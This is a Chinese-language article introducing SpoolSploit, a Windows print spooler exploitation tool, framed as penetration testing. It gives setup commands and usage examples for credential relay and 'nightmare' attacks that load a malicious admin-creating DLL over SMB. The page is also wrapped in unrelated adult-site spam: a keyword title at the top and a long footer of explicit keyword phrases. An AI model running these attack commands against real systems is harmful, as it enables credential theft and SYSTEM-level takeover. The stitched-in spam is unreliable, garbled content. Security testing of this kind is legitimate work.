成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何使用SpoolSploit審查Windows打印后臺處理程序的安全性

安全 網站安全
研究人員可以使用SpoolSploit檢測Windows打印后臺處理程序(print spooler)中存在的安全漏洞,并通過實際的利用技術來進行滲透測試或安全審計。

[[439991]]

關于SpoolSploit

SpoolSploit是一款針對Windows打印后臺處理程序(print spooler)的安全審計工具,廣大研究人員可以使用SpoolSploit檢測Windows打印后臺處理程序(print spooler)中存在的安全漏洞,并通過實際的利用技術來進行滲透測試或安全審計。

SpoolSploit中還封裝了很多其他的實用工具,以便進行實際的漏洞利用和滲透測試。并實現了兩種方法來中繼計算機帳戶憑據,以升級權限并在具有完全系統訪問權限的節點上執行惡意DLL。

快速開始

自該項目發布之日起,SpoolSploit Docker容器已在最新版本的macOS、Ubuntu Linux和Windows 10上成功測試。

我們建議廣大用戶在SpoolSploit Docker容器內執行滲透測試或憑據中繼測試,并托管相應的DLL文件,然后確保運行Docker容器的主機上開啟并未使用的445端口。在Windows主機上運行此容器時,這種情況最為普遍,因為默認情況下它使用的是端口445。如果你的主機上端口445已被占用或無法使用的話,可以在網橋模式下配置了網絡適配器的虛擬機中運行Docker容器即可。

(1) 工具下載&訪問SpoolSploit容器

首先,使用下列命令將該項目源碼克隆至本地:

  1. git clone https://github.com/BeetleChunks/SpoolSploit 

接下來,構建SpoolSploit Docker容器鏡像:

  1. cd SpoolSploit 
  2.  
  3. sudo docker build -t spoolsploit . 

創建并啟動SpoolSploit Docker容器:

  1. sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest 

綁定容器:

  1. sudo docker exec -it spoolsploit /bin/bash 

(2) 命令行使用

  1. usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD 
  2.  
  3. optional arguments: 
  4.  
  5.   -h, --help               顯示幫助信息并退出 
  6.  
  7.   -a {spoolsample,nightmare}, --attack {spoolsample,nightmare} 
  8.  
  9.                         需要在目標主機上執行的測試類型 
  10.  
  11.   -rH RHOST, --rhost RHOST 
  12.  
  13.                         遠程目標IP、CIDR范圍或文件名 (file:<path>
  14.  
  15.   -rP {139,445}, --rport {139,445} 
  16.  
  17.                         遠程SMB服務器端口 
  18.  
  19.   -lH LHOST, --lhost LHOST 
  20.  
  21.                         監聽主機名或IP地址 
  22.  
  23.   -lS LSHARE, --lshare LSHARE 
  24.  
  25.                         SMB共享 (UNC) 
  26.  
  27.   -d DOMAIN, --domain DOMAIN 
  28.  
  29.                         身份認證域名 
  30.  
  31.   -u USER, --username USER 
  32.  
  33.                         身份認證用戶名 
  34.  
  35.   -p PASSWD, --password PASSWD 
  36.  
  37.                         身份認證密碼 

工機使用樣例

使用樣例1:

  1. python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 

使用樣例2:

  1. python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 

SpoolSample - Windows設備賬號憑證獲取和中繼

  1. sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/ 
  2.  
  3. sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll' 

工具使用截圖

項目地址

SpoolSploit:【GitHub傳送門

 

 

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2014-03-11 14:41:23

2009-11-30 09:41:38

2022-06-22 09:00:00

安全編程語言工具

2020-07-01 07:49:44

防火墻網絡安全網絡攻擊

2016-06-12 11:53:27

2011-02-13 14:36:35

2013-02-18 16:12:55

2019-10-24 10:40:51

Windows 10安全性密碼登錄

2020-06-15 10:18:42

SaaS審查提供商

2009-11-06 09:59:55

2021-10-19 06:05:20

網站安全網絡威脅網絡攻擊

2016-06-03 10:21:05

2010-04-20 10:10:13

2015-07-17 13:16:06

2012-07-30 10:07:01

2009-12-15 08:49:35

2009-10-21 13:15:20

2009-04-23 09:00:41

Windows 7微軟操作系統

2009-06-26 13:35:50

安全審計信息安全吉大正元

2020-10-08 10:15:15

LynisLinux系統安全
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 午夜精品一区二区三区在线观看 | 999www视频免费观看 | 国产精品一区二 | 国产成人精品免费视频大全最热 | 久久久久久久国产 | 人人射人人草 | av在线一区二区三区 | 欧美理伦片在线播放 | 欧美精品一区二区三区四区 | 欧美精品一区在线发布 | 国产精品久久久久久久久久三级 | 欧美伊人久久久久久久久影院 | 在线观看免费av网站 | 成人永久免费视频 | 国产免费一区 | 国产精品视频免费观看 | 自拍视频精品 | a欧美| 亚洲精品成人网 | 欧美极品在线视频 | 久久国产精品精品 | 亚洲一区二区三区免费在线观看 | 久久精品一级 | 一区二区三区在线 | 欧 | 特级a欧美做爰片毛片 | 综合精品久久久 | 国产在线拍偷自揄拍视频 | 91精品国产91久久综合桃花 | 中文字幕亚洲一区二区va在线 | 成人福利影院 | 精品国产乱码久久久久久影片 | 日本天堂视频 | 国产激情在线观看 | 欧美黄色大片在线观看 | 欧美精品一区二区三区视频 | 欧美视频网 | 国产伊人精品 | www97影院| 午夜电影一区 | 人人干人人干人人 | 香蕉视频91|